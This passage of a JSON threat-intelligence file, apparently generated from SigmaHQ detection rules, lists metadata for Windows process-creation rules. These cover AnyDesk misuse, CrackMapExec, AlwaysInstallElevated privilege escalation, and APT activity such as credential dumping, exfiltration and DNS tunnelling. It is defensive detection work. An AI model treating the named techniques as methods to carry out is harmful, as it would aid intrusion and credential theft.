oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", - "uuid": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", - "value": "Always Install Elevated Windows Installer", - "meta": { - "refs": [ - "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_windows_installer.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2020/10/13", - "filename": "proc_creation_win_always_install_elevated_windows_installer.yml", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", - "level": "medium", - "falsepositive": [ - "System administrator usage", - "Anti virus products" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "uuid": "b52e84a3-029e-4529-b09b-71d19dd27e94", - "value": "Use of Anydesk Remote Access Software", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/02/11", - "filename": "proc_creation_win_anydesk.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag", - "uuid": "b1377339-fda6-477a-b455-ac0923f9ec2c", - "value": "AnyDesk Inline Piped Password", - "meta": { - "refs": [ - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_piped_password_via_cli.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/09/28", - "filename": "proc_creation_win_anydesk_piped_password_via_cli.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate piping of the password to anydesk", - "Some FP could occure with similar tools that uses the same command line '--set-password'" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", - "uuid": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", - "value": "AnyDesk Silent Installation", - "meta": { - "refs": [ - "https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20", - "https://support.anydesk.com/Automatic_Deployment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_silent_install.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2021/08/06", - "filename": "proc_creation_win_anydesk_silent_install.yml", - "author": "J\u00e1n Tren\u010dansk\u00fd", - "level": "high", - "falsepositive": [ - "Legitimate deployment of AnyDesk" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "uuid": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", - "value": "Use of Anydesk Remote Access Software from Suspicious Folder", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_susp_folder.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/05/20", - "filename": "proc_creation_win_anydesk_susp_folder.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of AnyDesk from a non-standard folder" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", - "uuid": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", - "value": "Scheduled Task WScript VBScript", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_actinium_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" - ], - "creation_date": "2022/02/07", - "filename": "proc_creation_win_apt_actinium_persistence.yml", - "author": "Andreas Hunkeler (@Karneades)", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks.", - "uuid": "033fe7d6-66d1-4240-ac6b-28908009c71f", - "value": "APT29", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/", - "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml" - ], - "tags": [ - "attack.execution", - "attack.g0016", - "attack.t1059.001" - ], - "creation_date": "2018/12/04", - "filename": "proc_creation_win_apt_apt29_thinktanks.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects activity that could be related to Baby Shark malware", - "uuid": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", - "value": "Baby Shark Activity", - "meta": { - "refs": [ - "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_babyshark.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.001", - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1218.005" - ], - "creation_date": "2019/02/24", - "filename": "proc_creation_win_apt_babyshark.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", - "uuid": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", - "value": "Judgement Panda Credential Access Activity", - "meta": { - "refs": [ - "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" - ], - "creation_date": "2019/02/21", - "filename": "proc_creation_win_apt_bear_activity_gtr19.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report", - "uuid": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", - "value": "BlueMashroom DLL Load", - "meta": { - "refs": [ - "https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ], - "creation_date": "2019/10/02", - "filename": "proc_creation_win_apt_bluemashroom.yml", - "author": "Florian Roth, Tim Shelton", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", - "uuid": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", - "value": "Chafer Activity", - "meta": { - "refs": [ - "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2018/03/23", - "filename": "proc_creation_win_apt_chafer_mar18.yml", - "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects wmiexec vbs version execution by wscript or cscript", - "uuid": "966e4016-627f-44f7-8341-f394905c361f", - "value": "WMIExec VBS Script", - "meta": { - "refs": [ - "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml" - ], - "tags": [ - "attack.execution", - "attack.g0045", - "attack.t1059.005" - ], - "creation_date": "2017/04/07", - "filename": "proc_creation_win_apt_cloudhopper.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects CrackMapExecWin Activity as Described by NCSC", - "uuid": "04d9079e-3905-4b70-ad37-6bdf11304965", - "value": "CrackMapExecWin", - "meta": { - "refs": [ - "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control", - "https://attack.mitre.org/software/S0488/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_dragonfly.yml" - ], - "tags": [ - "attack.g0035", - "attack.credential_access", - "attack.discovery", - "attack.t1110", - "attack.t1087" - ], - "creation_date": "2018/04/08", - "filename": "proc_creation_win_apt_dragonfly.yml", - "author": "Markus Neis", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Elise backdoor acitivty as used by APT32", - "uuid": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", - "value": "Elise Backdoor", - "meta": { - "refs": [ - "https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_elise.yml" - ], - "tags": [ - "attack.g0030", - "attack.g0050", - "attack.s0081", - "attack.execution", - "attack.t1059.003" - ], - "creation_date": "2018/01/31", - "filename": "proc_creation_win_apt_elise.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", - "uuid": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", - "value": "Emissary Panda Malware SLLauncher", - "meta": { - "refs": [ - "https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965", - "https://twitter.com/cyb3rops/status/1168863899531132929", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2018/09/03", - "filename": "proc_creation_win_apt_emissarypanda_sep19.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects EmpireMonkey APT reported Activity", - "uuid": "10152a7b-b566-438f-a33c-390b607d1c8d", - "value": "Empire Monkey", - "meta": { - "refs": [ - "https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_empiremonkey.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ], - "creation_date": "2019/04/02", - "filename": "proc_creation_win_apt_empiremonkey.yml", - "author": "Markus Neis", - "level": "critical", - "falsepositive": [ - "Very Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a specific tool and export used by EquationGroup", - "uuid": "d465d1d8-27a2-4cca-9621-a800f37cf72e", - "value": "Equation Group DLL_U Load", - "meta": { - "refs": [ - "https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=", - "https://securelist.com/apt-slingshot/84312/", - "https://twitter.com/cyb3rops/status/972186477512839170", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml" - ], - "tags": [ - "attack.g0020", - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2019/03/04", - "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Golden Chickens deployment method as used by Evilnum in report published in July 2020", - "uuid": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", - "value": "EvilNum Golden Chickens Deployment via OCX Files", - "meta": { - "refs": [ - "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", - "https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2020/07/10", - "filename": "proc_creation_win_apt_evilnum_jul20.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "uuid": "18739897-21b1-41da-8ee4-5b786915a676", - "value": "GALLIUM Artefacts", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212", - "attack.command_and_control", - "attack.t1071" - ], - "creation_date": "2020/02/07", - "filename": "proc_creation_win_apt_gallium.yml", - "author": "Tim Burrell", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "uuid": "440a56bf-7873-4439-940a-1c8a671073c2", - "value": "GALLIUM Sha1 Artefacts", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium_sha1.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212", - "attack.command_and_control", - "attack.t1071" - ], - "creation_date": "2020/02/07", - "filename": "proc_creation_win_apt_gallium_sha1.yml", - "author": "Tim Burrell", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", - "uuid": "871b9555-69ca-4993-99d3-35a59f9f3599", - "value": "Suspicious UltraVNC Execution", - "meta": { - "refs": [ - "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", - "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gamaredon_ultravnc.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.g0047", - "attack.t1021.005" - ], - "creation_date": "2022/03/04", - "filename": "proc_creation_win_apt_gamaredon_ultravnc.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects tools and process executions as observed in a Greenbug campaign in May 2020", - "uuid": "3711eee4-a808-4849-8a14-faf733da3612", - "value": "Greenbug Campaign Indicators", - "meta": { - "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml" - ], - "tags": [ - "attack.g0049", - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1036.005" - ], - "creation_date": "2020/05/20", - "filename": "proc_creation_win_apt_greenbug_may20.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", - "uuid": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", - "value": "Exchange Exploitation Activity", - "meta": { - "refs": [ - "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", - "https://twitter.com/GadixCRK/status/1369313704869834753?s=20", - "https://twitter.com/BleepinComputer/status/1372218235949617161", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546", - "attack.t1053" - ], - "creation_date": "2021/03/09", - "filename": "proc_creation_win_apt_hafnium.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Hurricane Panda Activity", - "uuid": "0eb2107b-a596-422e-b123-b389d5594ed7", - "value": "Hurricane Panda Activity", - "meta": { - "refs": [ - "https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.g0009", - "attack.t1068" - ], - "creation_date": "2019/03/04", - "filename": "proc_creation_win_apt_hurricane_panda.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Judgement Panda activity as described in Global Threat Report 2019 by Crowdstrike", - "uuid": "03e2746e-2b31-42f1-ab7a-eb39365b2422", - "value": "Judgement Panda Exfil Activity", - "meta": { - "refs": [ - "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.g0010", - "attack.credential_access", - "attack.t1003.001", - "attack.exfiltration", - "attack.t1560.001" - ], - "creation_date": "2019/02/21", - "filename": "proc_creation_win_apt_judgement_panda_gtr19.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Registry modifications performed by Ke3chang malware in campaigns running in 2019 and 2020", - "uuid": "7b544661-69fc-419f-9a59-82ccc328f205", - "value": "Ke3chang Registry Key Modifications", - "meta": { - "refs": [ - "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", - "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ke3chang_regadd.yml" - ], - "tags": [ - "attack.g0004", - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2020/06/18", - "filename": "proc_creation_win_apt_ke3chang_regadd.yml", - "author": "Markus Neis, Swisscom", - "level": "critical", - "falsepositive": [ - "Will need to be looked for combinations of those processes" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity", - "uuid": "4a12fa47-c735-4032-a214-6fab5b120670", - "value": "Lazarus Activity Apr21", - "meta": { - "refs": [ - "https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_apr21.yml" - ], - "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1106" - ], - "creation_date": "2021/04/20", - "filename": "proc_creation_win_apt_lazarus_activity_apr21.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Should not be any false positives" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects different process creation events as described in various threat reports on Lazarus group activity", - "uuid": "24c4d154-05a4-4b99-b57d-9b977472443a", - "value": "Lazarus Activity Dec20", - "meta": { - "refs": [ - "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", - "https://www.hvs-consulting.de/lazarus-report/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml" - ], - "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" - ], - "creation_date": "2020/12/23", - "filename": "proc_creation_win_apt_lazarus_activity_dec20.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Overlap with legitimate process activity in some cases (especially selection 3 and 4)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects different loaders as described in various threat reports on Lazarus group activity", - "uuid": "7b49c990-4a9a-4e65-ba95-47c9cc448f6e", - "value": "Lazarus Loaders", - "meta": { - "refs": [ - "https://www.hvs-consulting.de/lazarus-report/", - "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml" - ], - "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" - ], - "creation_date": "2020/12/23", - "filename": "proc_creation_win_apt_lazarus_loader.yml", - "author": "Florian Roth, wagga", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects executables launched outside their default directories as used by Lazarus Group (Bluenoroff)", - "uuid": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", - "value": "Lazarus Session Highjacker", - "meta": { - "refs": [ - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_session_highjack.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ], - "creation_date": "2020/06/03", - "filename": "proc_creation_win_apt_lazarus_session_highjack.yml", - "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command line patterns as seen being used by MERCURY threat actor", - "uuid": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", - "value": "MERCURY Command Line Patterns", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mercury.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.g0069" - ], - "creation_date": "2022/08/26", - "filename": "proc_creation_win_apt_mercury.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detecting DNS tunnel activity for Muddywater actor", - "uuid": "36222790-0d43-4fe8-86e4-674b27809543", - "value": "DNS Tunnel Technique from MuddyWater", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/", - "https://www.vmray.com/analyses/5ad401c3a568/report/overview.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_muddywater_dnstunnel.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2020/06/04", - "filename": "proc_creation_win_apt_muddywater_dnstunnel.yml", - "author": "@caliskanfurkan_", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific process parameters as used by Mustang Panda droppers", - "uuid": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", - "value": "Mustang Panda Dropper", - "meta": { - "refs": [ - "https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/", - "https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/", - "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml" - ], - "tags": [ - "attack.t1587.001", - "attack.resource_development" - ], - "creation_date": "2019/10/30", - "filename": "proc_creation_win_apt_mustangpanda.yml", - "author": "Florian Roth, oscd.community", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", - "uuid": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", - "value": "REvil Kaseya Incident Malware Patterns", - "meta": { - "refs": [ - "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers", - "https://www.joesandbox.com/analysis/443736/0/html", - "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", - "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", - "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059", - "attack.g0115" - ], - "creation_date": "2021/07/03", - "filename": "proc_creation_win_apt_revil_kaseya.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Silence downloader. These commands are hardcoded into the binary.", - "uuid": "170901d1-de11-4de7-bccb-8fa13678d857", - "value": "Silence.Downloader V3", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_silence_downloader_v3.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001", - "attack.discovery", - "attack.t1057", - "attack.t1082", - "attack.t1016", - "attack.t1033", - "attack.g0091" - ], - "creation_date": "2019/11/01", - "filename": "proc_creation_win_apt_silence_downloader_v3.yml", - "author": "Alina Stepchenkova, Roman Rezvukhin, Group-IB, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "uuid": "958d81aa-8566-4cea-a565-59ccd4df27b0", - "value": "Defrag Deactivation", - "meta": { - "refs": [ - "https://securelist.com/apt-slingshot/84312/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.005", - "attack.s0111" - ], - "creation_date": "2019/03/04", - "filename": "proc_creation_win_apt_slingshot.yml", - "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - 